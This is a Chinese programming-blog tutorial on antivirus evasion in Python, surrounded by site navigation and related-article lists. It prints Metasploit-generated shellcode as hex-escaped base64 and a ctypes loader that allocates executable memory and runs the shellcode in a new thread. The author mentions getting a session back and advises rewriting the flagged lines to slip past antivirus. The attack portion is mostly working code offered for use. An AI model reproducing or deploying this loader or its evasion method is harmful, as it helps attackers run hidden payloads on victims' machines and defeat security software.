首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python使用urllib2模块获取gravatar头像实例
Dec 18 Python
Python tempfile模块学习笔记(临时文件)
May 25 Python
Python ORM框架SQLAlchemy学习笔记之数据查询实例
Jun 10 Python
python脚本设置超时机制系统时间的方法
Feb 21 Python
Python学习小技巧之列表项的拼接
May 20 Python
详解如何使用Python编写vim插件
Nov 28 Python
python中的turtle库函数简单使用教程
Jul 23 Python
对Python中DataFrame选择某列值为XX的行实例详解
Jan 29 Python
使用python 写一个静态服务(实战)
Jun 28 Python
Python使用openpyxl复制整张sheet
Mar 24 Python
给numpy.array增加维度的超简单方法
Jun 02 Python
Python中json.load()和json.loads()有哪些区别
Jun 07 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
REST(1) exists(2) 相对路径 (1) Mint UI(1) mt-swipe(1) cmd(1) 相对路径(1) Switch(1) 远程桌面(2) 慢日志(1)
You might like
php 禁止页面缓存输出
2009/01/07 PHP
PHP 5.3新增魔术方法__invoke概述
2014/07/23 PHP
thinkPHP3.2简单实现文件上传的方法
2016/05/16 PHP
php微信公众号开发(3)php实现简单微信文本通讯
2016/12/15 PHP
thinkPHP框架动态配置用法实例分析
2018/06/14 PHP
小议javascript 设计模式 推荐
2009/10/28 Javascript
javascript(js)的小数点乘法除法问题详解
2014/03/07 Javascript
JS实现网页顶部向下滑出的全国城市切换导航效果
2015/08/22 Javascript
浅谈如何实现easyui的datebox格式化
2016/06/12 Javascript
js与jquery分别实现tab标签页功能的方法
2016/11/18 Javascript
Vue中保存用户登录状态实例代码
2017/06/07 Javascript
three.js搭建室内场景教程
2018/12/30 Javascript
如何实现小程序tab栏下划线动画效果
2019/05/18 Javascript
原生JS实现汇率转换功能代码实例
2020/05/13 Javascript
python运行时间的几种方法
2016/06/17 Python
Python结合ImageMagick实现多张图片合并为一个pdf文件的方法
2018/04/24 Python
python如何制作缩略图
2019/04/30 Python
十行代码使用Python写一个USB病毒
2019/06/21 Python
tf.concat中axis的含义与使用详解
2020/02/07 Python
pycharm解决关闭flask后依旧可以访问服务的问题
2020/04/03 Python
Python利用Xpath选择器爬取京东网商品信息
2020/06/01 Python
CSS3实现王者荣耀匹配人员加载页面的方法
2019/04/16 HTML / CSS
LN-CC美国:伦敦时尚生活的缩影
2019/02/19 全球购物
英国最大的笔记本电脑直销专家:Laptops Direct
2019/07/20 全球购物
"火柴棍式"程序员面试题
2014/03/16 面试题
Oracle中delete,truncate和drop的区别
2016/05/05 面试题
青春奉献演讲稿
2014/05/08 职场文书
财务管理专业求职信
2014/06/11 职场文书
小学生成绩单评语
2014/12/31 职场文书
综合管理员岗位职责
2015/02/11 职场文书
综治目标管理责任书
2015/05/11 职场文书
民事答辩状范本
2015/05/21 职场文书
主题班会开场白
2015/06/01 职场文书
Mysql中where与on的区别及何时使用详析
2021/08/04 MySQL
Python中递归以及递归遍历目录详解
2021/10/24 Python
Nginx使用ngx_http_upstream_module实现负载均衡功能示例
2022/08/05 Servers